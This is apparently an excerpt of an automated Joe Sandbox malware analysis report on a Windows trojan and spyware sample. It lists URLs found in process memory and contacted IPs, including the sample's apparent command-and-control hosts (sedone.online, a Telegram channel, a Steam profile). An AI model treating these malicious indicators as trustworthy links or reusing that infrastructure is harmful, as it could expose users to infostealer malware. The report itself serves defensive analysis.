                                                                                                                https://www.deezer.com/79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                                  		high
                                                                                                                  https://www.youtube.com/?feature=ytcachrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://issuetracker.google.com/255411748msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563061355.0000782402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://anglebug.com/7246chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://anglebug.com/7369chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1561855963.00007824025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://anglebug.com/7489chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://duckduckgo.com/?q=chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://chrome.google.com/webstorechrome.exe, 0000000A.00000003.1484398172.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1683403996.000039980238C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 0000000A.00000002.1565586304.0000782402D58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/3205erchrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://issuetracker.google.com/161903006msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.ecosia.org/newtab/chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmp, VKXB16.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://excel.new?from=EdgeM365Shoreline79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                                                                		high
                                                                                                                                                https://t.me/detct0rd0wntgMozilla/5.0dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://duckduckgo.com/favicon.icochrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567236689.00007824030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000A.00000002.1563515050.000078240295C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527112152.0000782403174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567347047.0000782403174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403174000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://sedone.online/CWz#dZKPE9gotO.exe, 00000000.00000003.1416494529.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/3078chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/7553chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/5375chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/5371chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/4722chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566326820.0000782402EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/7556chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://chromewebstore.google.com/chrome.exe, 0000000A.00000002.1560599146.000078240238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1683403996.000039980238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.15.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://sedone.online/pWdZKPE9gotO.exe, 00000000.00000003.1416494529.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000003.1440528532.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgdZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://sedone.online/oWF#dZKPE9gotO.exe, 00000000.00000003.1416494529.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000003.1393466949.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000003.1440528532.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://sedone.onlinedZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/$chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/6692chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/3502chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.office.com79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/3625msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://outlook.live.com/mail/0/79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/3624msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://docs.google.com/presentation/Jchrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/5007chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000A.00000002.1561830253.0000782402594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000A.00000003.1486986919.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481279735.0000782402E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481327210.0000782402E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487889087.0000782402E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1489388170.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562044896.000078240264B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482998939.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487869153.000078240253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481562325.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1484398172.0000782402F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 0000000A.00000002.1565586304.0000782402D58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://issuetracker.google.com/issues/166475273msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icochrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://docs.google.com/presentation/:chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  23.33.40.139
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  23.219.82.75
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  116.203.12.114
                                                                                                                                                                                                                                  		sedone.onlineGermany
                                                                                                                                                                                                                                  		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                  162.159.61.3
                                                                                                                                                                                                                                  		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  150.171.28.10
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  172.217.21.36
                                                                                                                                                                                                                                  		www.google.comUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                  20.110.205.119
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  23.58.157.24
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                                                                                                                                                                                                                  204.79.197.219
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  142.250.181.65
                                                                                                                                                                                                                                  		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                  18.173.219.84
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                  172.64.41.3
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  13.69.239.72
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                  		unknownReserved
                                                                                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                                                                                  23.33.40.153
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.7
                                                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1576158
                                                                                                                                                                                                                                  Start date and time:2024-12-16 15:38:29 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 7m 2s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:33
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:dZKPE9gotO.exe
                                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                                  Original Sample Name:876a365bda09b9ef39605e375d677f0a.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@69/287@22/18
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
